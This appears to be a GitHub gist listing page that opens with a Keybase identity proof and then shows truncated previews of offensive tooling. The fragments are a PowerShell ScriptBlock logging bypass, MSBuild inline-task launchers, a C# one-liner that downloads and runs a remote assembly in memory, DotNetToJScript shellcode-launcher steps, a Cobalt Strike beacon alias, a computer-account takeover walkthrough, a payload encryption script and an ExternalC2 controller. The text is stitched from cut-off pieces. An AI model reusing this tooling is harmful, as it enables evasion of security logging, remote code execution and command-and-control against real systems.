I hereby claim:
- I am luxcupitor on github.
- I am luxcupitor (https://keybase.io/luxcupitor) on keybase.
- I have a public key whose fingerprint is 6BDD C78C 4EBB 00CD 1CF8 946B 8176 AD22 5F33 0312
To claim this, I am signing this object:
I hereby claim:
To claim this, I am signing this object:
# ScriptBlock Logging Bypass | |
# @cobbr_io | |
$GroupPolicyField = [ref].Assembly.GetType('System.Management.Automation.Utils')."GetFie`ld"('cachedGroupPolicySettings', 'N'+'onPublic,Static') | |
If ($GroupPolicyField) { | |
$GroupPolicyCache = $GroupPolicyField.GetValue($null) | |
If ($GroupPolicyCache['ScriptB'+'lockLogging']) { | |
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0 | |
$GroupPolicyCache['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0 | |
} |
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<Target Name="DemoClass"> | |
<ClassExample /> | |
</Target> | |
<UsingTask | |
TaskName="ClassExample" | |
TaskFactory="CodeTaskFactory" | |
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | |
<Task> | |
<Code Type="Class" Language="cs"> |
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003"> | |
<Target Name="Business"> | |
<BusinessTime /> | |
</Target> | |
<UsingTask | |
TaskName="BusinessTime" | |
TaskFactory="CodeTaskFactory" | |
AssemblyFile="C:\Windows\Microsoft.Net\Framework\v4.0.30319\Microsoft.Build.Tasks.v4.0.dll" > | |
<ParameterGroup/> | |
<Task> |
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } } |
1. C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /target:library C:\Tools\shellcodeLauncher.cs | |
2. DotNetToJScript.exe --lang=JScript --ver=v4 -c ShellCodeLauncher.Program C:\Tools\shellcodeLauncher.dll |
$dotnetpath = "/usr/local/share/dotnet/dotnet"; | |
$sharpgenpath = "/Users/dtmsecurity/Tools/SharpGen/bin/Debug/netcoreapp2.1/SharpGen.dll"; | |
$temppath = "/tmp/"; | |
beacon_command_register("sharpgen", "Compile and execute C-Sharp","Synopsis: sharpgen [code]\n"); | |
alias sharpgen{ | |
$executionId = "sharpgen_" . int(rand() * 100000); | |
$temporaryCsharp = $temppath . $executionId . ".cs"; | |
$executableFilename = $temppath . $executionId . ".exe"; |
# import the necessary toolsets | |
Import-Module .\powermad.ps1 | |
Import-Module .\powerview.ps1 | |
# we are TESTLAB\attacker, who has GenericWrite rights over the primary$ computer account | |
whoami | |
# the target computer object we're taking over | |
$TargetComputer = "primary.testlab.local" |
#!/usr/bin/python | |
# -*- coding: utf8 -*- | |
# | |
# Author: Arno0x0x, Twitter: @Arno0x0x | |
# | |
import argparse | |
from Crypto.Cipher import AES | |
import pyscrypt | |
from base64 import b64encode |
import socket | |
import struct | |
import time | |
class ExternalC2Controller: | |
def __init__(self, port): | |
self.port = port | |
def encodeFrame(self, data): | |
return struct.pack("<I", len(data)) + data |